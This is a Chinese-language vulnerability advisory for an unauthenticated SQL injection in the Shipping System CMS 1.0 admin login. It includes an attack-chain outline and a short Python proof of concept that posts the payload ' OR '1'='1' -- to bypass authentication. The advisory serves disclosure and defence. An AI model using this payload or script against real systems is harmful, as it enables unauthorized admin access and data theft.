CVE-2018-25183 CVSS 8.2 高危

CVE-2018-25183 Shipping System CMS SQL注入漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25183

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Shipping System CMS

漏洞概述

Shipping System CMS 1.0版本存在严重的SQL注入漏洞。该漏洞源于系统在处理管理员登录请求时，对用户名参数缺乏有效的安全过滤。未经身份验证的攻击者能够通过构造特定的恶意SQL载荷，利用基于布尔值的盲注技术绕过身份验证机制。这使得攻击者无需合法凭据即可成功登录后台，进而可能导致数据泄露或系统被完全控制。

技术细节

该漏洞位于Shipping System CMS的登录接口中。当用户尝试登录时，应用程序将用户输入的用户名直接拼接到SQL查询语句中，未使用预编译语句或进行适当的转义处理，导致了经典的SQL注入漏洞。攻击者可以通过向管理员登录端点发送POST请求，并在username字段中注入布尔盲注Payload。由于数据库逻辑为真时响应与为假时可能存在差异（如页面内容变化），攻击者可以逐步推断出数据库结构或直接绕过密码验证逻辑。由于CVSS向量显示无需用户交互且无需认证，攻击者可远程直接利用此漏洞获取管理员权限。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行的是Shipping System CMS 1.0，并定位到管理员登录页面。

STEP 2

武器化

攻击者构造恶意的SQL注入Payload，旨在通过逻辑判断绕过登录验证。

STEP 3

交付

攻击者向登录端点发送POST请求，将Payload注入到用户名字段中。

STEP 4

利用

后端数据库执行了注入的SQL语句，导致验证逻辑失效，攻击者获得管理员会话。

STEP 5

行动

攻击者利用获得的管理员权限访问后台数据，进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(url):
    target_url = f"{url}/admin/login"
    # Payload demonstrating authentication bypass
    payload = {
        "username": "' OR '1'='1' -- ",
        "password": "any_password"
    }
    
    try:
        response = requests.post(target_url, data=payload)
        if response.status_code == 200 and "dashboard" in response.text.lower():
            print("[+] Exploit successful! Authentication bypassed.")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com"
    exploit(target)

影响范围

Shipping System CMS 1.0

防御指南

临时缓解措施

建议立即将系统升级至最新版本或停止使用受影响版本。在未升级前，应在Web应用防火墙（WAF）中部署规则，拦截针对登录接口的异常SQL注入请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表